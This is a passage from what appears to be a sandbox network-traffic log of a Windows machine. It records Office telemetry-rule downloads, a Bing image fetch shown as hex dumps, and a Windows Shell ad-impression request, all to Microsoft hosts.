2024-12-08 12:31:23 UTC	192	OUT	GET /rules/rule120618v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-08 12:31:24 UTC	470	IN	HTTP/1.1 200 OK Date: Sun, 08 Dec 2024 12:31:24 GMT Content-Type: text/xml Content-Length: 486 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:30 GMT ETag: "0x8DC582B9018290B" x-ms-request-id: 22943564-b01e-0021-0b03-48cab7000000 x-ms-version: 2018-03-28 x-azure-ref: 20241208T123124Z-r1cf579d7789trgthC1EWRkkfc000000061g000000002m27 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-08 12:31:24 UTC	486	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120618" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120617" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
32	192.168.2.6	49750	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-08 12:31:23 UTC	192	OUT	GET /rules/rule120616v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-08 12:31:24 UTC	470	IN	HTTP/1.1 200 OK Date: Sun, 08 Dec 2024 12:31:24 GMT Content-Type: text/xml Content-Length: 486 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT ETag: "0x8DC582BB344914B" x-ms-request-id: 3fcfbabf-e01e-0052-0903-48d9df000000 x-ms-version: 2018-03-28 x-azure-ref: 20241208T123124Z-r1cf579d7789trgthC1EWRkkfc000000061g000000002m28 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-08 12:31:24 UTC	486	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120616" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120615" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
33	192.168.2.6	49749	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-08 12:31:23 UTC	192	OUT	GET /rules/rule120617v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-08 12:31:24 UTC	470	IN	HTTP/1.1 200 OK Date: Sun, 08 Dec 2024 12:31:24 GMT Content-Type: text/xml Content-Length: 427 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:02 GMT ETag: "0x8DC582BA310DA18" x-ms-request-id: 682fb484-401e-0083-5904-48075c000000 x-ms-version: 2018-03-28 x-azure-ref: 20241208T123124Z-r1cf579d7782ctslhC1EWRfbrw00000005v0000000002x37 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-08 12:31:24 UTC	427	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 5b 53 73 5d 5b 4f 6f 5d 5b 46 66 5d 5b 54 74 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120617" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120615" /> <SR T="2" R="([Mm][Ii][Cc][Rr][Oo][Ss][Oo][Ff][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"

Session ID	Source IP	Source Port	Destination IP	Destination Port
34	192.168.2.6	49752	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-08 12:31:25 UTC	192	OUT	GET /rules/rule120619v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-08 12:31:25 UTC	470	IN	HTTP/1.1 200 OK Date: Sun, 08 Dec 2024 12:31:25 GMT Content-Type: text/xml Content-Length: 407 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:41 GMT ETag: "0x8DC582B9698189B" x-ms-request-id: aae5b6c6-f01e-005d-7a06-4813ba000000 x-ms-version: 2018-03-28 x-azure-ref: 20241208T123125Z-r1cf579d778t6txphC1EWRsd4400000005tg000000003x99 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-08 12:31:25 UTC	407	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 43 63 5d 5b 45 65 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120619" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120617" /> <SR T="2" R="([Aa][Cc][Ee][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
35	192.168.2.6	49753	150.171.27.10	443

Timestamp	Bytes transferred	Direction	Data
2024-12-08 12:31:25 UTC	375	OUT	GET /th?id=OADD2.10239385875220_1FZJ7DDRUSKY0IVFA&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90 HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate, br User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045 Host: tse1.mm.bing.net Connection: Keep-Alive
2024-12-08 12:31:25 UTC	856	IN	HTTP/1.1 200 OK Cache-Control: public, max-age=2592000 Content-Length: 501573 Content-Type: image/jpeg X-Cache: TCP_HIT Access-Control-Allow-Origin: * Access-Control-Allow-Headers: * Access-Control-Allow-Methods: GET, POST, OPTIONS Timing-Allow-Origin: * Report-To: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]} NEL: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0} Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version X-MSEdge-Ref: Ref A: DD752846244D40229FCD4F503950A524 Ref B: EWR311000103039 Ref C: 2024-12-08T12:31:25Z Date: Sun, 08 Dec 2024 12:31:25 GMT Connection: close
2024-12-08 12:31:25 UTC	15528	IN	Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff e1 13 6e 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 07 01 12 00 03 00 00 00 01 00 01 00 00 01 1a 00 05 00 00 00 01 00 00 00 62 01 1b 00 05 00 00 00 01 00 00 00 6a 01 28 00 03 00 00 00 01 00 02 00 00 01 31 00 02 00 00 00 1f 00 00 00 72 01 32 00 02 00 00 00 14 00 00 00 92 87 69 00 04 00 00 00 01 00 00 00 a6 00 00 00 d2 00 60 00 00 00 01 00 00 00 60 00 00 00 01 00 00 41 64 6f 62 65 20 50 68 6f 74 6f 73 68 6f 70 20 32 34 2e 36 20 28 57 69 6e 64 6f 77 73 29 00 00 32 30 32 33 3a 30 38 3a 31 34 20 30 38 3a 32 35 3a 34 32 00 00 03 a0 01 00 03 00 00 00 01 ff ff 00 00 a0 02 00 04 00 00 00 01 00 00 07 80 a0 03 00 04 00 00 00 01 00 00 04 38 00 00 00 00 00 00 00 06 01 03 00 03 00 00 00 01 00 06 00 00 01 Data Ascii: JFIF``nExifMM*bj(1r2i``Adobe Photoshop 24.6 (Windows)2023:08:14 08:25:428
2024-12-08 12:31:26 UTC	16384	IN	Data Raw: e6 9d c4 56 51 da 9c a2 9d b6 9c ab 4c 2c 22 0a 91 79 a5 51 f2 d3 95 7d 29 dc 9b 0f 40 36 d2 b2 52 a2 91 52 28 aa 52 33 6b 52 06 1f 37 34 ab 52 ba 53 55 08 aa ba 21 a6 35 97 35 14 91 d5 ad 99 a3 cb f9 aa f9 ac 66 e2 67 3c 59 a6 18 88 ad 4f 2b 34 7d 9f 35 5c c6 7c a8 cd f2 06 da 46 87 d2 b4 d6 0a 72 db 83 4f 9c 5c a8 c8 f2 29 be 41 ad 7f b3 d1 f6 5a 39 c7 ca 65 f9 38 a9 63 8a af 0b 6f 5a 7a db e2 97 39 4a 05 64 8a a6 8e 2a b1 1c 35 37 93 fe cd 4f b4 41 ec d9 59 61 cd 39 60 c5 5a 11 54 c9 10 2b 47 b4 17 21 45 62 3b aa 58 e3 21 b3 56 5a 13 bb 85 a7 c7 17 ad 3f 68 4f b3 62 42 08 a9 d0 7c d4 a9 1e 6a c2 45 4d 4c 87 4c 92 db ee e2 af 5b 03 bb 35 4f cb 29 cd 5f b3 23 6a d5 73 99 4a 06 95 b6 4a f3 56 12 12 5a 92 c1 01 55 3d ab 52 de 34 6e 94 73 d8 e6 94 6c 52 4b Data Ascii: VQL,"yQ})@6RR(R3kR74RSU!55fg<YO+4}5\\|FrO\)AZ9e8coZz9Jd*57OAYa9`ZT+G!Eb;X!VZ?hObB\|jEMLL[5O)_#jsJJVZU=R4nslRK
2024-12-08 12:31:26 UTC	16384	IN	Data Raw: 1a cc ba b4 db d2 bb 29 e2 13 12 81 87 e5 0d d9 a9 ed a1 dc d4 b3 40 e8 d9 a9 ec 54 9e 69 d4 9d d1 d1 04 c9 e1 87 6f f0 d5 88 62 cf 4a 96 dd 32 be f5 72 de 1a f3 aa 54 36 0b 35 75 ad 7b 1c 95 e6 aa db c5 57 ed 57 0b 5c 53 95 d9 33 d8 98 26 69 1a 1c 55 84 51 4e 60 4d 41 cb ce ca 5e 4f bd 1e 4f fb 35 a0 91 06 5a 73 42 2a 6c 1e dc cf 8e 32 2a 4f 2b da ad 79 15 2c 70 8e 94 ac c9 75 91 52 18 fe 6a b4 91 0a 95 61 c5 4a 89 47 2b 39 e7 56 e4 2b 1e 2a 65 4a 95 12 a5 8e 3a 14 59 cf 2a 84 42 3a 95 13 e5 c5 48 b1 d3 d6 33 5b c2 36 31 75 2e 40 b1 d3 d1 70 d5 23 2e 29 6b 45 a1 3c d7 23 61 48 cb 53 2a d2 ed cd 55 89 e6 20 5c 8a 91 4d 3b 65 2e da b5 70 72 4c 55 3f 35 4f 0e 3b d4 41 00 a9 12 b6 83 31 96 a5 85 18 e9 4c 6e 29 e8 32 b4 c9 01 db 5b 37 a1 8a dc 63 91 4c 6c 52 Data Ascii: )@TiobJ2rT65u{WW\S3&iUQN`MA^OO5ZsBl2O+y,puRjaJG+9V+eJ:YB:H3[61u.@p#.)kE<#aHS*U \M;e.prLU?5O;A1Ln)2[7cLlR
2024-12-08 12:31:26 UTC	16384	IN	Data Raw: d6 36 5f f8 15 57 59 16 ac c2 d1 b7 06 75 ae fa 35 27 27 6e 7f cb f5 30 9c 52 e8 38 6a 38 ff 00 9e 82 9d fd a5 9f e2 6f f8 12 d4 b1 da c7 27 fc bc ad 29 d3 a2 ef 26 7f e0 35 e8 aa 58 e6 ae a5 a7 af fc 13 0e 6a 3d 51 08 d4 3f dd 6a 72 dd c5 22 ed 65 6a 6b d8 db ff 00 79 69 a7 4f 88 fd d6 5f c2 b1 6b 1a bb 3f b8 af dc bf 21 5b c8 3f c4 cb 51 b2 45 ff 00 3d 96 92 4b 22 bd 37 55 79 2d dd 79 fd e7 fd f3 5c 35 bd a2 f8 a9 fe 66 91 51 7f 68 98 c3 19 ff 00 96 cb 4d 6b 71 d9 a3 6a ae fb c5 45 e6 b8 eb ba bc e9 d6 87 58 9b 2a 72 e8 c9 e4 81 fb 2c 7f f7 d5 41 24 12 8f f9 66 b4 a0 c6 dd 6e 95 7e ab 4e 0b 01 6f f8 fe 5a e7 6d 3d bf 34 5a 6d 6e ff 00 02 bb 46 e3 83 1e da 63 46 0f fb 35 a2 b0 db b7 fc be ff 00 df 34 1b 48 9b a5 c3 37 fc 06 b3 94 27 e5 f7 a2 95 64 b7 32 Data Ascii: 6_WYu5''n0R8j8o')&5Xj=Q?jr"ejkyiO_k?![?QE=K"7Uy-y\5fQhMkqjEX*r,A$fn~NoZm=4ZmnFcF54H7'd2
2024-12-08 12:31:26 UTC	16384	IN	Data Raw: d5 a2 81 9b 98 f6 6a 6b 35 31 8d 35 9a ad 40 cd cc 73 3d 23 49 4c 63 4d cf bd 57 21 2e a5 87 ef a3 7d 33 9a 33 ef 55 c8 67 ed 07 33 1a 46 73 4d 63 8e b4 de b4 f9 45 ed 85 66 a3 75 1b 69 8d 8a 39 51 1e d1 8e df 46 fa 8f ad 25 3e 54 1e d4 95 5e 8d d5 0e 69 f8 f9 69 72 a0 8d 56 39 9a 9b be 86 06 9a c3 14 d4 43 9c 76 fa 46 7a 66 1a 8d a6 9f 29 3e d1 a1 59 f3 48 cd 45 36 84 91 9b a9 2e e3 b7 66 8a 45 e2 95 aa ac 85 cc d8 9c d2 f3 47 34 da 2c 27 26 c7 73 4c ce 29 76 d2 6d a7 ca 2b 89 9f 7a 16 9d 8f 4a 5c 53 b3 0b 88 a2 97 a5 39 45 0c 28 b0 86 51 4e c2 d2 3d 00 26 7d e8 cf bd 18 6a 55 5a a1 5c 65 1c d3 d8 63 ad 31 88 aa 48 4d 88 dc 52 31 a1 a8 51 56 a2 67 7e c2 73 4e 51 9a 17 14 b9 f7 a7 66 2b 8d a5 5a 55 5f 9a 9c ab 4e c2 b8 8a 0d 3d 45 2a ad 28 1b 69 02 d4 29 Data Ascii: jk515@s=#ILcMW!.}33Ug3FsMcEfui9QF%>T^iirV9CvFzf)>YHE6.fEG4,'&sL)vm+zJ\S9E(QN=&}jUZ\ec1HMR1QVg~sNQf+ZU_N=E*(i)
2024-12-08 12:31:26 UTC	16384	IN	Data Raw: d0 9a 31 77 bb 25 d1 ef 6d 2c f5 4d d7 1b 95 5b fe 5a 2e 7e 5f a8 1d 45 5c d4 3c 4b 69 15 e2 c7 a7 ed 9c f5 66 6c aa fe 15 cc df b6 e6 6a a3 1b e2 eb 27 e5 3b ab ba 14 54 95 c9 a9 2f 7d 1e 99 a3 ea 76 97 be 58 46 db 33 af cc 8a a5 b6 fe 35 62 fb 64 4d f3 ff 00 df 35 c0 c7 71 2c 4c 92 47 23 29 5f ee fc b5 ab 6f ab 4e b2 27 9f 27 99 1f f1 6e ae 49 51 71 77 46 8e 17 56 37 50 87 66 29 4e 60 11 77 9f 94 55 37 6c 6d 9e 36 e1 bf 89 5b e5 a6 34 f2 15 54 2c cc 17 fb d5 d3 1d 51 e7 ca 2d 4a c4 fa 93 81 6e a0 37 de fe 25 6a af 1d d4 7f 67 6f 33 76 e5 ff 00 c7 aa 37 39 fe 1a 63 2f cd 9a b8 dd 30 94 62 d5 99 24 37 71 bb 62 45 f2 cf f7 bf 86 ae 37 97 1e dd cd f7 b9 5a cb 92 3c f2 29 10 91 5d 49 b6 8e 49 45 26 69 b4 b6 ea b9 dd f7 bf 86 ab 3c 8e d2 67 ee 8f f6 6a 35 73 Data Ascii: 1w%m,M[Z.~_E\<Kiflj';T/}vXF35bdM5q,LG#)_oN''nIQqwFV7Pf)N`wU7lm6[4T,Q-Jn7%jgo3v79c/0b$7qbE7Z<)]IIE&i<gj5s
2024-12-08 12:31:26 UTC	16384	IN	Data Raw: 4f 96 b8 ff 00 78 d2 ba 42 17 3e 57 f1 7b d2 b0 2b f2 09 69 bb c0 5e 57 77 e7 48 43 26 48 ca f1 13 2f fb 4a c7 fa d3 ed da cc 6d f9 5b 3f de 6f 9a 96 12 7c cd e2 2d a3 fd ed d4 f5 32 9e 63 65 63 fd d5 53 43 7a 58 2d 70 fd d8 56 3e 52 b6 ef f6 4d 22 14 66 e1 55 47 5f 9b e6 a7 23 38 6f 9d 59 4d 48 bb 1b 6e 1b fe 03 51 7b 07 28 e8 64 9f f8 17 e5 ff 00 74 62 86 48 dd bc d7 89 57 e6 fb cb 4e 44 08 b9 48 bf ef a6 a7 47 2f ca a0 ab 2f fb ac 6b 3d ca 50 b9 0b db 47 23 65 17 69 5f f6 82 b5 21 87 6f 58 96 4d bf de 6f 9a ac f9 e8 bb 87 de 3f ed 61 a9 11 cf df 78 3e 55 6f ba bf c5 f8 50 a5 24 8b d1 22 ab 32 47 b8 6d 68 f7 7f 7a 95 5f e5 c0 58 db fb cc bf 2f f3 ab 13 45 1b ab 6c f3 17 77 de 56 f9 95 68 8e ca 01 f7 1b 6b 7e 3b 7f 5a ae 75 6b b2 5b 6c a5 1b cf 14 9b 02 Data Ascii: OxB>W{+i^WwHC&H/Jm[?o\|-2cecSCzX-pV>RM"fUG_#8oYMHnQ{(dtbHWNDHG//k=PG#ei_!oXMo?ax>UoP$"2Gmhz_X/ElwVhk~;Zuk[l
2024-12-08 12:31:26 UTC	16069	IN	Data Raw: 1f f9 32 5f 98 47 0a 9a f8 8a 17 9a bf 93 ba 3f dd ee dd f3 32 c6 3e 5f ca b3 ee 75 9b 86 e4 5c b2 8f fa 66 a1 7f 4a ea ec 6e b5 8b e8 d6 3d 43 43 d1 34 70 dc 46 97 2b 19 6f a2 a8 e4 9f ad 49 aa ff 00 6c c7 32 4f 69 a7 e8 52 79 5f c4 f1 c7 1f 1d f3 92 41 ad 63 9c c2 2f 95 d3 57 ff 00 12 fc f6 35 fa ba b1 c2 be af fb bd a1 ae d9 9b ee b3 37 cb 51 0b cd 61 db 11 c0 d2 6e fe 2d a5 ab a4 bf f1 0f 89 dd 67 7b 9d 0f c3 ba 64 71 a8 db e6 2a 3f 98 4f 7c a8 63 50 6c 69 6d 57 ed de 2f 82 d8 4a a5 f6 c0 c1 07 e4 f8 24 fe 15 d4 b3 66 96 b4 d7 df cd ff 00 a4 a0 f6 3a d8 e7 1a 4b dd cc 92 ae d2 bf c3 b7 77 f3 a1 2d ef 5d 7c c3 a7 dc b0 fb ca de 41 55 fe 55 d0 59 cf 71 05 d2 c7 a0 78 9e e6 fa 66 e5 51 6d 92 67 c0 ea 78 6e 2b 6d fc 41 67 67 a3 db 5e 6b 7a 85 dc b7 32 a9 Data Ascii: 2_G?2>_u\fJn=CC4pF+oIl2OiRy_Ac/W57Qan-g{dq*?O\|cPlimW/J$f:Kw-]\|AUUYqxfQmgxn+mAgg^kz2
2024-12-08 12:31:26 UTC	16384	IN	Data Raw: fa 81 5b 12 68 d7 d7 4b e7 ff 00 c2 2f e5 8b a5 cc 72 c8 db 37 7f bb 18 23 19 1e d5 8b 7f e1 2d 57 4b 5f b5 cb 6d 68 c2 4c bf fa f1 bd 40 e3 a1 c0 cd 77 61 fe aa e6 9d 59 5e 5b 2b b5 f8 25 a2 2a 35 2f a1 96 ba 9d fc 90 cf 78 34 cf 2e 36 6f de 4a b1 fa 70 07 3d ab 5f c2 77 9a b9 d3 de e1 20 df e6 49 96 da ab bb db 68 eb 50 ad ee 9e da 7f d9 f5 49 64 59 95 46 e6 8a 4d df 27 a6 38 19 ac 35 d5 a5 86 69 62 b0 dd 05 bc 8d f7 7e f6 ec 74 cd 7a 12 a5 ed a2 e2 a1 6f 50 b2 b6 8c ef 74 5b 2b 4b db cf b4 de 34 cb 27 98 76 c0 ab be 4f c7 b0 fc e9 9a e6 89 a5 ee 98 cf 04 68 79 dd fb cc 96 27 9f 5c 0c 57 0f 67 ae 6a f6 d7 8b 71 6f 73 e5 9e 7f dd e7 82 6a d4 97 e4 ed fb 44 ed 2e ef 93 64 7f 2a e3 d4 67 d6 b9 5e 06 bc 6a 73 29 e9 e4 67 2b a2 db db 5e 43 63 26 9f a5 7e fe Data Ascii: [hK/r7#-WK_mhL@waY^[+%5/x4.6oJp=_w IhPIdYFM'85ib~tzoPt[+K4'vOhy'\WgjqosjD.dg^js)g+^Cc&~
2024-12-08 12:31:26 UTC	16384	IN	Data Raw: b2 6b b3 0b 85 95 ff 00 75 4e c9 7f 5a 7f 98 3b bd 4d 27 88 cd 24 66 79 19 06 d3 f2 70 cf 9c e0 74 e4 56 ee 93 14 1a 9d ab 5b 6a 13 db 41 a7 d8 a6 24 8d a6 dd 34 dd 7e 63 d8 31 ae 67 4a d1 7c 40 d2 31 2c b0 4b 3a 03 e4 36 5a 46 1d b2 3b 55 cb 84 d6 e1 b3 91 0e 94 cc bd 59 a2 db b9 b0 73 fe 78 ad ab 42 32 f7 23 35 7f 5d 88 49 dc bb 71 a7 68 f2 c8 c9 a6 5c dd ac 71 e0 2a ee dc 9b c8 ea 7f 95 73 7e 20 b2 d7 2c d6 29 66 68 5a 28 79 f3 62 6d ad 83 fa d7 4b e1 df 0c 79 b6 29 36 a1 ac 49 6f 75 79 97 4b 44 52 ee a3 fd b0 3a 1f ad 57 d6 bc 1c 93 ab b4 1a 85 f3 49 13 61 56 78 02 27 1e a4 9c fe 94 51 c4 53 a7 57 95 ce eb cd 7e a0 9b 23 b3 5d 1b fb 36 0b 9d 4a f1 a4 9a 45 03 66 ef 91 72 78 cf 4f d6 af eb 71 e9 f0 d8 c0 b6 76 be 5b 44 db fc f5 c2 b6 4f 19 00 76 ae 5e Data Ascii: kuNZ;M'$fyptV[jA$4~c1gJ\|@1,K:6ZF;UYsxB2#5]Iqh\q*s~ ,)fhZ(ybmKy)6IouyKDR:WIaVx'QSW~#]6JEfrxOqv[DOv^

Session ID	Source IP	Source Port	Destination IP	Destination Port
36	192.168.2.6	49751	20.234.120.54	443

Timestamp	Bytes transferred	Direction	Data
2024-12-08 12:31:25 UTC	602	OUT	GET /v1/a/impression?CID=128000000001615609&region=CH&lang=EN-CH%2CEN-GB&oem=&devFam=WINDOWS.DESKTOP&ossku=PROFESSIONAL&cmdVer=10.0.19041.1023&mo=&cap=&EID=&&PID=426081542&UIT=M-&TargetID=1&AN=311176752&PG=PC000P0FR5.0000000IRU&REQASID=0E7CE6B6AC244AB98054235EFE6BCC46&UNID=338389&ASID=34e77c2273584e07b7d7b447b5142ea0&&DS_EVTID=0E7CE6B6AC244AB98054235EFE6BCC46&DEVOSVER=10.0.19045.2006&REQT=20241208T123102&TIME=20241208T123109Z&ARCRAS=&CLR=CDM HTTP/1.1 Accept-Encoding: gzip, deflate User-Agent: WindowsShellClient/9.0.40929.0 (Windows) Host: ris.api.iris.microsoft.com Connection: Keep-Alive
2024-12-08 12:31:26 UTC	183	IN	HTTP/1.1 204 No Content Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 request-id: 50761702-f041-4277-ac91-eb08f7f64273 Date: Sun, 08 Dec 2024 12:31:25 GMT Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port
37	192.168.2.6	49754	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-08 12:31:26 UTC	192	OUT	GET /rules/rule120620v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-08 12:31:26 UTC	470	IN	HTTP/1.1 200 OK Date: Sun, 08 Dec 2024 12:31:26 GMT Content-Type: text/xml Content-Length: 469 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT ETag: "0x8DC582BBA701121" x-ms-request-id: 3bfd724e-501e-0016-6705-48181b000000 x-ms-version: 2018-03-28 x-azure-ref: 20241208T123126Z-r1cf579d7788pwqzhC1EWRrpd800000005n0000000002x6e x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-08 12:31:26 UTC	469	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" 